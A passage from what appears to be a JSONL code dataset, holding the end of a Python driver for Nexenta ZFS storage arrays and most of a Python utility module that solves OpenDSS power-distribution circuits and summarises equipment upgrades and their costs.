\"set_child_prop\", [name, prop, val])\n if data['error'] is not None:\n raise ex.Error(data[\"error\"])\n return data['result']\n\n def get_props(self, name):\n otype = self.object_type(name)\n return self._get_props(otype, name)\n\n def _get_props(self, otype, name):\n data = self.rest(otype, \"get_child_props\", [name, ''])\n if data['error'] is not None:\n raise ex.Error(data[\"error\"])\n return data['result']\n\n def set_can_mount(self, name):\n p = self.get_props(name)\n if not 'canmount' in p:\n return\n self.set_prop(name, \"canmount\", \"on\")\n\n def autosync_set_can_mount(self, name):\n folders = self.folder_get_names()\n props = self.autosync_get_props(name)\n\n if props['zfs/from-host'] == 'localhost':\n synchead = props['zfs/from-fs']\n else:\n synchead = props['zfs/to-fs']\n\n synchead = synchead.lstrip('/')\n for folder in folders:\n if not folder.startswith(synchead):\n continue\n self.set_can_mount(folder)\n self.log.info(\"set 'canmount = on' on folder %s\"%folder)\n\n def snapclone(self, src, dst):\n self.snapshot_create(src, dst)\n self.clone(src, dst)\n\nif __name__ == \"__main__\":\n o = Nexenta(\"nexenta1\")\n #names = o.autosync_register(\"test\")\n #print(o.set_prop(\"vol1/folder1\", \"canmount\", \"on\"))\n #print(o.get_props(\"vol1/folder1\"))\n print(Nexenta(\"nexenta1\").dbus_auth_keys_list())\n print(Nexenta(\"nexenta2\").dbus_auth_keys_list())\n #print(o.autosync_set_can_mount(\"vol1-folder1-000\"))\n #names = o.autosync_get_names()\n #print(o.autosync_set_prop(names[0], \"zfs/reverse_capable\", \"1\"))\n #print(o.autosync_get_state(names[0]))\n #print(o.autosync_get_props(names[0]))\n #print(o.snapshot_create(\"vol1/zvol1\", \"test\"))\n #print(o.snapshot_get_names())\n #print(o.snapshot_destroy(\"vol1/zvol1\", \"test\"))\n #print(o.snapclone(\"vol1/folder1\", \"vol1/folder2\"))\n\n","repo_name":"opensvc/opensvc","sub_path":"opensvc/drivers/array/nexenta.py","file_name":"nexenta.py","file_ext":"py","file_size_in_byte":11354,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"66"} +{"seq_id":"19861425623","text":"import os\r\nimport math\r\nimport logging\r\nimport pathlib\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport opendssdirect as dss\r\n\r\nfrom .pydss_parameters import *\r\nfrom jade.utils.timing_utils import track_timing, Timer\r\n\r\nfrom disco import timer_stats_collector\r\nfrom disco.enums import LoadMultiplierType\r\nfrom disco.exceptions import (\r\n OpenDssCompileError,\r\n OpenDssConvergenceError,\r\n UpgradesExternalCatalogRequired,\r\n UpgradesExternalCatalogMissingObjectDefinition,\r\n InvalidOpenDssElementError,\r\n)\r\nfrom disco.models.upgrade_cost_analysis_generic_input_model import (\r\n _extract_specific_model_properties_, \r\n LineCodeCatalogModel, LineGeometryCatalogModel,\r\n LineModel, LineCatalogModel,\r\n TransformerModel, TransformerCatalogModel,\r\n)\r\nfrom disco.models.upgrade_cost_analysis_generic_output_model import UpgradesCostResultSummaryModel, \\\r\n CapacitorControllerResultType, VoltageRegulatorResultType, EquipmentUpgradeStatusModel\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\nDSS_XFMR_FLOAT_FIELDS = _extract_specific_model_properties_(model_name=TransformerModel, field_type_key=\"type\", field_type_value=\"number\")\r\nDSS_XFMR_INT_FIELDS = _extract_specific_model_properties_(model_name=TransformerModel, field_type_key=\"type\", field_type_value=\"integer\")\r\nDSS_LINE_FLOAT_FIELDS = _extract_specific_model_properties_(model_name=LineModel, field_type_key=\"type\", field_type_value=\"number\")\r\nDSS_LINE_INT_FIELDS = _extract_specific_model_properties_(model_name=LineModel, field_type_key=\"type\", field_type_value=\"integer\")\r\nDSS_LINECODE_FLOAT_FIELDS = _extract_specific_model_properties_(model_name=LineCodeCatalogModel, field_type_key=\"type\", field_type_value=\"number\")\r\nDSS_LINECODE_INT_FIELDS = _extract_specific_model_properties_(model_name=LineCodeCatalogModel, field_type_key=\"type\", field_type_value=\"integer\")\r\nDSS_LINEGEOMETRY_FLOAT_FIELDS = _extract_specific_model_properties_(model_name=LineGeometryCatalogModel, field_type_key=\"type\", field_type_value=\"number\")\r\nDSS_LINEGEOMETRY_INT_FIELDS = _extract_specific_model_properties_(model_name=LineGeometryCatalogModel, field_type_key=\"type\", field_type_value=\"integer\")\r\nDSS_UNIT_CONFIG = {1: \"mi\", 2: \"kft\", 3: \"m\", 4: \"Ft\", 5: \"in\", 6: \"cm\",\r\n 0: \"none\" # 0 maps to none, which means impedance units and line length units match\r\n }\r\n\r\n@track_timing(timer_stats_collector)\r\ndef reload_dss_circuit(dss_file_list, commands_list=None, **kwargs):\r\n \"\"\"This function clears the circuit and loads dss files and commands.\r\n Also solves the circuit and checks for convergence errors\r\n\r\n Parameters\r\n ----------\r\n dss_file_list\r\n commands_list\r\n\r\n Returns\r\n -------\r\n\r\n \"\"\"\r\n logger.info(\"Reloading OpenDSS circuit\")\r\n check_dss_run_command(\"clear\")\r\n if dss_file_list is None:\r\n raise Exception(\"No OpenDSS files have been passed to be loaded.\")\r\n for dss_file in dss_file_list:\r\n logger.info(f\"Redirecting '{dss_file}'.\")\r\n check_dss_run_command(f\"Redirect '{dss_file}'\")\r\n dc_ac_ratio = kwargs.get('dc_ac_ratio', None)\r\n if dc_ac_ratio is not None:\r\n change_pv_pctpmpp(dc_ac_ratio=dc_ac_ratio)\r\n if commands_list is not None:\r\n logger.info(f\"Running {len(commands_list)} dss commands\")\r\n for command_string in commands_list:\r\n check_dss_run_command(command_string)\r\n if \"new \" in command_string.lower():\r\n check_dss_run_command(\"CalcVoltageBases\")\r\n enable_pydss_solve = kwargs.get(\"enable_pydss_solve\", False)\r\n raise_exception = kwargs.get(\"raise_exception\", True)\r\n if enable_pydss_solve:\r\n pydss_params = define_initial_pydss_settings(**kwargs)\r\n circuit_solve_and_check(raise_exception=raise_exception, **pydss_params)\r\n return pydss_params\r\n else:\r\n max_control_iterations = kwargs.get(\"max_control_iterations\", None)\r\n if max_control_iterations is not None:\r\n dss.Solution.MaxControlIterations(max_control_iterations)\r\n circuit_solve_and_check(raise_exception=raise_exception)\r\n return kwargs\r\n\r\n\r\ndef run_selective_master_dss(master_filepath, **kwargs):\r\n \"\"\"This function executes master.dss file line by line and ignores some commands that Solve yearly mode,\r\n export or plot data.\r\n\r\n Parameters\r\n ----------\r\n master_filepath\r\n\r\n Returns\r\n -------\r\n\r\n \"\"\"\r\n run_dir = os.getcwd()\r\n check_dss_run_command(\"Clear\")\r\n # logger.info(\"Redirecting master file:\")\r\n # check_dss_run_command(f\"Redirect {master_filepath}\")\r\n\r\n # do this instead of redirect master to ignore some lines (e.g., that solve for the whole year)\r\n os.chdir(os.path.dirname(master_filepath))\r\n logger.debug(master_filepath)\r\n with open(master_filepath, \"r\") as fr:\r\n tlines = fr.readlines()\r\n for line in tlines:\r\n if ('Solve'.lower() in line.lower()) or ('Export'.lower() in line.lower()) or ('Plot'.lower() in line.lower()):\r\n logger.info(f\"Skipping this line: {line}\")\r\n continue\r\n else:\r\n check_dss_run_command(f\"{line}\")\r\n circuit_solve_and_check(raise_exception=True, **kwargs)\r\n os.chdir(run_dir)\r\n return\r\n\r\n\r\n@track_timing(timer_stats_collector)\r\ndef circuit_solve_and_check(raise_exception=False, **kwargs):\r\n \"\"\"This function solves the circuit (both OpenDSS and PyDSS-if enabled)\r\n and can raise exception if convergence error occurs\r\n\r\n Parameters\r\n ----------\r\n raise_exception\r\n kwargs\r\n\r\n Returns\r\n -------\r\n\r\n \"\"\"\r\n calcvoltagebases = kwargs.pop(\"calcvoltagebases\", False)\r\n if calcvoltagebases:\r\n check_dss_run_command(\"CalcVoltageBases\")\r\n dss_pass_flag = dss_solve_and_check(raise_exception=raise_exception)\r\n pass_flag = dss_pass_flag\r\n enable_pydss_solve = kwargs.get(\"enable_pydss_solve\", False)\r\n if enable_pydss_solve: # if pydss solver is also to be used\r\n pydss_pass_flag = pydss_solve_and_check(raise_exception=raise_exception, **kwargs)\r\n pass_flag = dss_pass_flag and pydss_pass_flag\r\n return pass_flag\r\n\r\n\r\ndef dss_solve_and_check(raise_exception=False):\r\n \"\"\"This function solves OpenDSS and returns bool flag which shows if it has converged or not.\r\n\r\n Parameters\r\n ----------\r\n raise_exception\r\n\r\n Returns\r\n -------\r\n bool\r\n \"\"\"\r\n dss.Solution.Solve()\r\n logger.debug(\"Solving circuit using OpenDSS\")\r\n # check_dss_run_command('CalcVoltageBases')\r\n dss_pass_flag = dss.Solution.Converged()\r\n if not dss_pass_flag:\r\n logger.info(f\"OpenDSS Convergence Error\")\r\n if raise_exception:\r\n raise OpenDssConvergenceError(\"OpenDSS solution did not converge\")\r\n return dss_pass_flag\r\n\r\n\r\ndef dss_run_command_list(command_list):\r\n for command_string in command_list:\r\n check_dss_run_command(command_string)\r\n return\r\n\r\n\r\ndef write_text_file(string_list, text_file_path, **kwargs):\r\n \"\"\"This function writes the string contents of a list to a text file\r\n\r\n Parameters\r\n ----------\r\n string_list\r\n text_file_path\r\n\r\n Returns\r\n -------\r\n\r\n \"\"\"\r\n num_new_lines = kwargs.get(\"num_new_lines\", 2)\r\n breaks = \"\\n\"*num_new_lines\r\n pathlib.Path(text_file_path).write_text(breaks.join(string_list))\r\n\r\n\r\ndef create_upgraded_master_dss(dss_file_list, upgraded_master_dss_filepath, original_master_filename=\"master.dss\"):\r\n \"\"\"Function to create master dss with redirects to upgrades dss file.\r\n The redirect paths in this file are:\r\n * absolute path - to the original master dss file\r\n * relative path (relative to the upgraded_master dss file) if upgrades dss file\"\"\"\r\n command_list = []\r\n for filename in dss_file_list:\r\n if os.path.basename(filename) == original_master_filename:\r\n new_filename = _get_master_dss_filepath(filename, upgraded_master_dss_filepath)\r\n else: \r\n new_filename = os.path.relpath(filename, os.path.dirname(upgraded_master_dss_filepath))\r\n command_list.append(f\"Redirect {new_filename}\")\r\n return command_list\r\n\r\n\r\ndef _get_master_dss_filepath(original_master, upgraded_master):\r\n if os.path.isabs(upgraded_master):\r\n # Here it is not possible to use a relative path in all cases.\r\n # The runtime output directory may have a different root than the source files.\r\n return os.path.abspath(original_master)\r\n\r\n return os.path.relpath(original_master, os.path.dirname(upgraded_master))\r\n\r\n\r\ndef create_dataframe_from_nested_dict(user_dict, index_names):\r\n \"\"\"This function creates dataframe from a nested dictionary\r\n\r\n Parameters\r\n ----------\r\n user_dict\r\n index_names\r\n\r\n Returns\r\n -------\r\n DataFrame\r\n \"\"\"\r\n df = pd.DataFrame.from_dict({(i, j): user_dict[i][j]\r\n for i in user_dict.keys()\r\n for j in user_dict[i].keys()},\r\n orient='index')\r\n df.index.names = index_names\r\n return df.reset_index()\r\n\r\n\r\ndef get_dictionary_of_duplicates(df, subset, index_field):\r\n \"\"\"This creates a mapping dictionary of duplicate indices in a dataframe\r\n\r\n Parameters\r\n ----------\r\n df\r\n subset\r\n index_field\r\n\r\n Returns\r\n -------\r\n Dictionary\r\n \"\"\"\r\n df.set_index(index_field, inplace=True)\r\n df = df[df.duplicated(keep=False, subset=subset)]\r\n tuple_list = df.groupby(subset).apply(lambda x: tuple(x.index)).tolist()\r\n mapping_dict = {v: tup[0] for tup in tuple_list for v in tup}\r\n return mapping_dict\r\n\r\n\r\ndef convert_length_units(length, unit_in, unit_out):\r\n \"\"\"Length unit converter\"\"\"\r\n LENGTH_CONVERSION = {'mm': 0.001, 'cm': 0.01, 'm': 1.0, 'km': 1000., \"mi\": 1609.34, \"kft\": 304.8, \r\n \"ft\": 0.3048, \"in\": 0.0254,}\r\n return length*LENGTH_CONVERSION[unit_in]/LENGTH_CONVERSION[unit_out]\r\n\r\n\r\ndef get_scenario_name(enable_pydss_solve, pydss_volt_var_model):\r\n \"\"\"This function determines the controller scenario \r\n\r\n Parameters\r\n ----------\r\n enable_pydss_solve : bool\r\n pydss_volt_var_model \r\n\r\n Returns\r\n -------\r\n str\r\n \"\"\"\r\n if enable_pydss_solve:\r\n # scenario = pydss_volt_var_model.control1 # TODO can read in name instead\r\n scenario = \"control_mode\"\r\n else:\r\n scenario = \"pf1\"\r\n return scenario\r\n\r\n\r\ndef convert_dict_nan_to_none(temp):\r\n \"\"\"Convert np.nan in dictionary to None.\r\n This does change the data type of the field.\"\"\"\r\n for key, value in temp.items():\r\n if isinstance(value, dict):\r\n df = pd.DataFrame([value])\r\n if df.isna().values.any():\r\n df = df.astype(object).where(df.notna(), None) # replace NaN with None\r\n value = df.to_dict() \r\n else:\r\n continue\r\n elif isinstance(value, list) and bool(value) and isinstance(value[0], dict): # list of dicts\r\n df = pd.DataFrame(value)\r\n if df.isna().values.any():\r\n df = df.astype(object).where(df.notna(), None) # replace NaN with None\r\n value = df.to_dict(orient=\"records\") \r\n else:\r\n continue \r\n temp[key] = value\r\n return temp\r\n\r\n\r\n@track_timing(timer_stats_collector)\r\ndef change_pv_pctpmpp(dc_ac_ratio):\r\n \"\"\"This function changes PV system pctpmpp based on passed dc-ac ratio\r\n newpctpmpp = oldpctpmpp / dc_ac_ratio\r\n \"\"\"\r\n dss.PVsystems.First()\r\n for i in range(dss.PVsystems.Count()):\r\n newpctpmpp = int(dss.Properties.Value('%Pmpp')) / dc_ac_ratio\r\n command_string = f\"Edit PVSystem.{dss.PVsystems.Name()} %Pmpp={newpctpmpp}\"\r\n check_dss_run_command(command_string)\r\n dss.PVsystems.Next()\r\n\r\n\r\ndef get_feeder_stats(dss):\r\n \"\"\"This function gives metadata stats for a feeder \r\n\r\n Parameters\r\n ----------\r\n dss\r\n\r\n Returns\r\n -------\r\n dict\r\n \"\"\"\r\n load_kw = 0\r\n load_kVABase = 0\r\n pv_kw = 0\r\n pv_kVARated = 0\r\n \r\n load_df = dss.utils.loads_to_dataframe()\r\n if len(load_df) > 0:\r\n load_kw = load_df['kW'].sum()\r\n load_kVABase = load_df['kVABase'].sum()\r\n if dss.PVsystems.Count() > 0:\r\n pv_df = dss.utils.pvsystems_to_dataframe()\r\n pv_kw = pv_df['kW'].sum()\r\n pv_kVARated = pv_df['kVARated'].sum()\r\n data_dict = {\r\n 'total_load(kVABase)': load_kVABase,\r\n 'total_load(kW)': load_kw,\r\n 'total_PV(kW)': pv_kw,\r\n 'total_PV(kVARated)': pv_kVARated,\r\n }\r\n return data_dict\r\n\r\n\r\ndef get_upgrade_stage_stats(dss, upgrade_stage, upgrade_type, xfmr_loading_df, line_loading_df, bus_voltages_df, **kwargs):\r\n \"\"\"This function gives upgrade stage stats for a feeder \r\n upgrade_stage can be Initial or Final\r\n upgrade_type can be thermal or voltage\r\n \r\n \"\"\"\r\n final_dict = {\"stage\": upgrade_stage, \"upgrade_type\": upgrade_type}\r\n ckt_info_dict = get_circuit_info()\r\n final_dict[\"feeder_components\"] = ckt_info_dict\r\n final_dict[\"feeder_components\"].update({\r\n \"num_nodes\": dss.Circuit.NumNodes(),\r\n \"num_loads\": dss.Loads.Count(),\r\n \"num_lines\": dss.Lines.Count(),\r\n \"num_transformers\": dss.Transformers.Count(),\r\n \"num_pv_systems\": dss.PVsystems.Count(),\r\n \"num_capacitors\": dss.Capacitors.Count(),\r\n \"num_regulators\": dss.RegControls.Count(),\r\n } )\r\n equipment_dict = combine_equipment_health_stats(xfmr_loading_df, line_loading_df, bus_voltages_df, **kwargs)\r\n final_dict.update(equipment_dict)\r\n return final_dict\r\n\r\n\r\ndef combine_equipment_health_stats(xfmr_loading_df, line_loading_df, bus_voltages_df, **kwargs):\r\n line_properties = kwargs.get(\"line_properties\", \r\n ['name', 'phases','normamps', 'kV', 'line_placement', 'length', 'units', 'max_amp_loading', \r\n 'max_per_unit_loading', 'status'])\r\n xfmr_properties = kwargs.get(\"xfmr_properties\", \r\n ['name', 'phases', 'windings', 'conns', 'kV', 'kVA', 'amp_limit_per_phase','max_amp_loading', \r\n 'max_per_unit_loading', 'status'] )\r\n voltage_properties = kwargs.get(\"voltage_properties\", \r\n ['name', 'max_per_unit_voltage', 'min_per_unit_voltage', 'overvoltage_violation', \r\n 'max_voltage_deviation', 'undervoltage_violation', 'min_voltage_deviation'])\r\n capacitors_df = kwargs.get(\"capacitors_df\", pd.DataFrame())\r\n regcontrols_df = kwargs.get(\"regcontrols_df\", pd.DataFrame())\r\n capacitor_properties = kwargs.get(\"capacitor_properties\", \r\n ['capacitor_name','capcontrol_present', 'capcontrol_type', 'capcontrol_name', 'kv', 'kvar',\r\n 'phases', 'DeadTime', 'Delay', 'OFFsetting', 'ONsetting'])\r\n regcontrol_properties = kwargs.get(\"regcontrol_properties\", \r\n ['name', 'transformer', 'vreg', 'band', 'ptratio', 'delay', 'at_substation_xfmr_flag'])\r\n \r\n final_dict = {}\r\n # some file reformatting\r\n if \"windings\" in xfmr_properties:\r\n xfmr_loading_df[\"windings\"] = xfmr_loading_df[\"windings\"].astype(int)\r\n final_dict.update({\"transformer\": xfmr_loading_df[xfmr_properties].to_dict(orient=\"records\")})\r\n final_dict.update({\"line\": line_loading_df[line_properties].to_dict(orient=\"records\")})\r\n final_dict.update({\"bus_voltage\": bus_voltages_df[voltage_properties].to_dict(orient=\"records\")})\r\n if not capacitors_df.empty :\r\n final_dict.update({\"capacitor_control\": capacitors_df[capacitor_properties].to_dict(orient=\"records\")})\r\n else :\r\n final_dict.update({\"capacitor_control\": []})\r\n if not regcontrols_df.empty:\r\n final_dict.update({\"regulator_control\": regcontrols_df[regcontrol_properties].to_dict(orient=\"records\")})\r\n else:\r\n final_dict.update({\"regulator_control\": []})\r\n return final_dict\r\n\r\n\r\ndef get_circuit_info():\r\n \"\"\"This collects circuit information: source bus, feeder head info, substation xfmr information\r\n\r\n Returns\r\n -------\r\n Dictionary\r\n \"\"\"\r\n data_dict = {}\r\n dss.Vsources.First()\r\n data_dict['source_bus'] = dss.CktElement.BusNames()[0].split(\".\")[0]\r\n data_dict[\"feeder_head_name\"] = dss.Circuit.Name()\r\n dss.Circuit.SetActiveBus(data_dict['source_bus'])\r\n data_dict[\"feeder_head_basekv\"] = dss.Bus.kVBase()\r\n data_dict[\"source_num_nodes\"] = dss.Bus.NumNodes()\r\n data_dict[\"total_num_buses_in_circuit\"] = len(dss.Circuit.AllBusNames())\r\n if data_dict[\"source_num_nodes\"] > 1:\r\n data_dict[\"feeder_head_basekv\"] = round(data_dict[\"feeder_head_basekv\"] * math.sqrt(3), 1)\r\n data_dict[\"substation_xfmr\"] = None\r\n\r\n all_xfmr_df = get_thermal_equipment_info(compute_loading=False, equipment_type=\"transformer\")\r\n all_xfmr_df[\"substation_xfmr_flag\"] = all_xfmr_df.apply(lambda x: int(\r\n data_dict[\"source_bus\"].lower() in x['bus_names_only']), axis=1)\r\n if len(all_xfmr_df.loc[all_xfmr_df[\"substation_xfmr_flag\"] == True]) > 0:\r\n data_dict[\"substation_xfmr\"] = all_xfmr_df.loc[all_xfmr_df[\"substation_xfmr_flag\"] ==\r\n True].to_dict(orient='records')[0]\r\n # this checks if the voltage kVs are the same for the substation transformer\r\n data_dict[\"substation_xfmr\"][\"is_autotransformer_flag\"] = len(set(data_dict[\"substation_xfmr\"][\"kVs\"])) <= 1\r\n return data_dict\r\n\r\n\r\ndef summarize_upgrades_outputs(overall_outputs, **kwargs):\r\n \"\"\"This function creates summary of upgrades and costs results\"\"\"\r\n summary = {\"results\": {}}\r\n summary[\"results\"][\"name\"] = kwargs.get(\"job_name\", None)\r\n violation_summary = pd.DataFrame(overall_outputs[\"violation_summary\"])\r\n thermal_violations = sum(violation_summary.loc[(violation_summary[\"stage\"] == \"final\") & (violation_summary[\"upgrade_type\"] == \"thermal\")][[\"num_line_violations\", \"num_transformer_violations\"]].sum())\r\n voltage_violations = sum(violation_summary.loc[(violation_summary[\"stage\"] == \"final\") & (violation_summary[\"upgrade_type\"] == \"voltage\")][[\"num_voltage_violation_buses\"]].sum())\r\n summary[\"results\"][\"num_violations\"] = thermal_violations + voltage_violations\r\n if overall_outputs[\"costs_per_equipment\"]:\r\n summary[\"results\"][\"total_cost_usd\"] = pd.DataFrame(overall_outputs[\"costs_per_equipment\"])[\"total_cost_usd\"].sum()\r\n else:\r\n summary[\"results\"][\"total_cost_usd\"] = 0\r\n return summary\r\n\r\n\r\ndef create_thermal_output_summary(all_original_equipment, all_latest_equipment, thermal_equipment_type_list,\r\n props_dict, thermal_cost_df, upgrades_dict, output_cols):\r\n \"\"\"This function creates the thermal output summary file\"\"\"\r\n new_thermal_df = pd.DataFrame(columns=output_cols)\r\n for equipment_type in thermal_equipment_type_list:\r\n latest_equipment_df = pd.DataFrame(all_latest_equipment[equipment_type])\r\n latest_equipment_df = latest_equipment_df.rename(columns={props_dict[equipment_type][\"identifier\"]: \"equipment_name\"})\r\n original_equipment_df = pd.DataFrame(all_original_equipment[equipment_type])\r\n original_equipment_df = original_equipment_df.rename(columns={props_dict[equipment_type][\"identifier\"]: \"equipment_name\"})\r\n temp_upgrade_df = upgrades_dict[equipment_type]\r\n temp_upgrade_df = temp_upgrade_df.rename(columns={\"final_equipment_name\": \"equipment_name\"})\r\n if (temp_upgrade_df.empty) and (original_equipment_df.empty): # if there are no equipment of that type\r\n continue \r\n new_df = latest_equipment_df.copy(deep=True)\r\n new_df = pd.concat([new_df, pd.DataFrame(columns=list(set(output_cols)-set(new_df.columns)))], axis=1)\r\n new_df[\"equipment_type\"] = equipment_type\r\n new_df[\"total_cost_usd\"] = 0\r\n new_df[\"status\"] = EquipmentUpgradeStatusModel.unchanged.value\r\n \r\n if not temp_upgrade_df.empty:\r\n temp_cost_df = thermal_cost_df.loc[thermal_cost_df.type.str.lower() == equipment_type.lower()]\r\n temp_cost_df = temp_cost_df.rename(columns={\"final_equipment_name\": \"equipment_name\"})\r\n replaced = list(temp_upgrade_df.loc[temp_upgrade_df[\"upgrade_type\"]==\"upgrade\"][\"equipment_name\"].unique()) # list of replaced equipment\r\n new = list(temp_upgrade_df.loc[temp_upgrade_df[\"upgrade_type\"]==\"new_parallel\"][\"equipment_name\"].unique()) # list of new equipment\r\n # add upgrade status\r\n new_df.loc[new_df.equipment_name.isin(replaced), \"status\"] = EquipmentUpgradeStatusModel.replaced.value\r\n new_df.loc[new_df.equipment_name.isin(new), \"status\"] = EquipmentUpgradeStatusModel.new.value\r\n # add cost\r\n temp_cost_df.set_index(\"equipment_name\", inplace=True)\r\n new_df.set_index(\"equipment_name\", inplace=True)\r\n if len(temp_cost_df[temp_cost_df.index.duplicated()]) > 0:\r\n raise Exception(\"Duplicates upgrades shouldn't exist. Review logic for this feeder model case.\")\r\n new_df.loc[new_df.index.isin(temp_cost_df.index), \"total_cost_usd\"] = temp_cost_df.total_cost_usd\r\n else:\r\n new = []\r\n replaced = []\r\n parameter_list = props_dict[equipment_type][\"parameter_list\"]\r\n original_equipment_df.set_index(\"equipment_name\", inplace=True)\r\n for i in range(0, len(parameter_list)):\r\n new_df[f\"parameter{i+1}_name\"] = parameter_list[i]\r\n new_df[f\"parameter{i+1}_original\"] = new_df[parameter_list[i]]\r\n new_df[f\"parameter{i+1}_upgraded\"] = new_df[parameter_list[i]]\r\n new_df.loc[new_df.index.isin(new), f\"parameter{i+1}_original\"] = None # new equipment original rating is None\r\n new_df.loc[new_df.index.isin(replaced), f\"parameter{i+1}_original\"] = original_equipment_df.loc[original_equipment_df.index.isin(replaced)][parameter_list[i]]\r\n \r\n new_df.reset_index(inplace=True)\r\n new_df = new_df[output_cols]\r\n new_thermal_df = pd.concat([new_thermal_df, new_df])\r\n new_thermal_df = new_thermal_df.replace({np.NaN: None})\r\n return new_thermal_df\r\n\r\n\r\ndef create_capacitor_output_summary(temp_upgrade_df, temp_cost_df, latest_equipment_df, output_cols, equipment_type):\r\n # create new dataframe\r\n new_df = latest_equipment_df.copy(deep=True)\r\n new_df = pd.concat([new_df, pd.DataFrame(columns=list(set(output_cols)-set(new_df.columns)))], axis=1)\r\n new_df[\"equipment_type\"] = equipment_type\r\n new_df[\"total_cost_usd\"] = 0\r\n new_df[\"status\"] = EquipmentUpgradeStatusModel.unchanged.value\r\n \r\n if temp_upgrade_df.empty: # if there are no upgrades of this equipment type\r\n return new_df, [], []\r\n \r\n new = list(temp_upgrade_df.loc[temp_upgrade_df[\"new_controller_added\"]][\"equipment_name\"].unique()) # list of new equipment\r\n setting_changed = list(temp_upgrade_df.loc[temp_upgrade_df[\"controller_settings_modified\"]][\"equipment_name\"].unique()) # list of setting_changed equipment\r\n # get unit cost\r\n unit_cost_calc = temp_cost_df.loc[temp_cost_df.type == CapacitorControllerResultType.change_cap_control.value]\r\n if not unit_cost_calc.empty:\r\n setting_changed_unit_cost = (unit_cost_calc[\"total_cost_usd\"] / unit_cost_calc[\"count\"]).values[0]\r\n else: \r\n setting_changed_unit_cost = 0\r\n unit_cost_calc = temp_cost_df.loc[temp_cost_df.type == CapacitorControllerResultType.add_new_cap_controller.value]\r\n if not unit_cost_calc.empty:\r\n add_new_unit_cost = (unit_cost_calc[\"total_cost_usd\"] / unit_cost_calc[\"count\"]).values[0]\r\n else:\r\n add_new_unit_cost = 0\r\n # add upgrade status and cost\r\n new_df.loc[new_df.equipment_name.isin(setting_changed), \"status\"] = EquipmentUpgradeStatusModel.setting_changed.value\r\n new_df.loc[new_df.equipment_name.isin(setting_changed), \"total_cost_usd\"] = setting_changed_unit_cost\r\n new_df.loc[new_df.equipment_name.isin(new), \"status\"] = EquipmentUpgradeStatusModel.new.value\r\n new_df.loc[new_df.equipment_name.isin(new), \"total_cost_usd\"] = add_new_unit_cost\r\n return new_df, new, setting_changed \r\n\r\n\r\ndef create_regulator_output_summary(temp_upgrade_df, temp_cost_df, latest_equipment_df, output_cols, equipment_type): \r\n # create new dataframe\r\n new_df = latest_equipment_df.copy(deep=True)\r\n new_df = pd.concat([new_df, pd.DataFrame(columns=list(set(output_cols)-set(new_df.columns)))], axis=1)\r\n new_df[\"equipment_type\"] = equipment_type\r\n new_df[\"total_cost_usd\"] = 0\r\n new_df[\"status\"] = EquipmentUpgradeStatusModel.unchanged.value\r\n if temp_upgrade_df.empty: # if there are no upgrades of this equipment type\r\n return new_df, [], []\r\n \r\n new = list(temp_upgrade_df.loc[temp_upgrade_df[\"new_controller_added\"]][\"equipment_name\"].unique()) # list of new equipment\r\n setting_changed = list(temp_upgrade_df.loc[temp_upgrade_df[\"controller_settings_modified\"]][\"equipment_name\"].unique()) # list of setting_changed equipment\r\n # get unit cost \r\n unit_cost_calc = temp_cost_df.loc[temp_cost_df.type == VoltageRegulatorResultType.add_new_reg_control.value]\r\n if not unit_cost_calc.empty:\r\n new_vreg_unit_cost = (unit_cost_calc[\"total_cost_usd\"] / unit_cost_calc[\"count\"]).values[0]\r\n new_df.loc[(new_df.equipment_name.isin(new)) & (new_df.at_substation_xfmr_flag == False), \"total_cost_usd\"] = new_vreg_unit_cost\r\n unit_cost_calc = temp_cost_df.loc[temp_cost_df.type == VoltageRegulatorResultType.change_reg_control.value]\r\n if not unit_cost_calc.empty:\r\n vreg_setting_changed_unit_cost = (unit_cost_calc[\"total_cost_usd\"] / unit_cost_calc[\"count\"]).values[0]\r\n new_df.loc[(new_df.equipment_name.isin(setting_changed)) & (new_df.at_substation_xfmr_flag == False), \"total_cost_usd\"] = vreg_setting_changed_unit_cost\r\n unit_cost_calc = temp_cost_df.loc[temp_cost_df.type == VoltageRegulatorResultType.add_substation_ltc.value]\r\n if not unit_cost_calc.empty:\r\n new_ltc_unit_cost = (unit_cost_calc[\"total_cost_usd\"] / unit_cost_calc[\"count\"]).values[0]\r\n new_df.loc[(new_df.equipment_name.isin(new)) & (new_df.at_substation_xfmr_flag), \"total_cost_usd\"] = new_ltc_unit_cost\r\n unit_cost_calc = temp_cost_df.loc[temp_cost_df.type == VoltageRegulatorResultType.change_ltc_control.value]\r\n if not unit_cost_calc.empty:\r\n ltc_setting_changed_unit_cost = (unit_cost_calc[\"total_cost_usd\"] / unit_cost_calc[\"count\"]).values[0]\r\n new_df.loc[(new_df.equipment_name.isin(setting_changed)) & (new_df.at_substation_xfmr_flag), \"total_cost_usd\"] = ltc_setting_changed_unit_cost\r\n # add upgrade status\r\n new_df.loc[new_df.equipment_name.isin(setting_changed), \"status\"] = EquipmentUpgradeStatusModel.setting_changed.value\r\n new_df.loc[new_df.equipment_name.isin(new), \"status\"] = EquipmentUpgradeStatusModel.new.value\r\n return new_df, new, setting_changed \r\n\r\n\r\ndef create_voltage_output_summary(all_original_equipment, all_latest_equipment, voltage_equipment_type_list,\r\n props_dict, voltage_cost_df, upgrades_dict, output_cols):\r\n # VOLTAGE EQUIPMENT\r\n voltage_upgrade_df = upgrades_dict[\"voltage\"]\r\n voltage_upgrade_df = voltage_upgrade_df.rename(columns={\"final_equipment_name\": \"equipment_name\"})\r\n new_voltage_df = pd.DataFrame(columns=output_cols)\r\n \r\n for equipment_type in voltage_equipment_type_list:\r\n latest_equipment_df = pd.DataFrame(all_latest_equipment[equipment_type])\r\n latest_equipment_df = latest_equipment_df.rename(columns={props_dict[equipment_type][\"identifier\"]: \"equipment_name\"})\r\n original_equipment_df = pd.DataFrame(all_original_equipment[equipment_type])\r\n original_equipment_df = original_equipment_df.rename(columns={props_dict[equipment_type][\"identifier\"]: \"equipment_name\"})\r\n if (voltage_upgrade_df.empty) and (original_equipment_df.empty): # if there are no equipment for voltage controls\r\n continue \r\n if not voltage_upgrade_df.empty: # if there are voltage upgrades, extract for this equipment type\r\n temp_cost_df = voltage_cost_df.loc[voltage_cost_df.type.isin(props_dict[equipment_type][\"model\"].list_values())]\r\n temp_upgrade_df = voltage_upgrade_df.loc[voltage_upgrade_df.equipment_type.str.lower() == props_dict[equipment_type][\"upgrades_file_string\"].lower()]\r\n else:\r\n temp_upgrade_df = pd.DataFrame(columns=voltage_upgrade_df.columns)\r\n temp_cost_df = 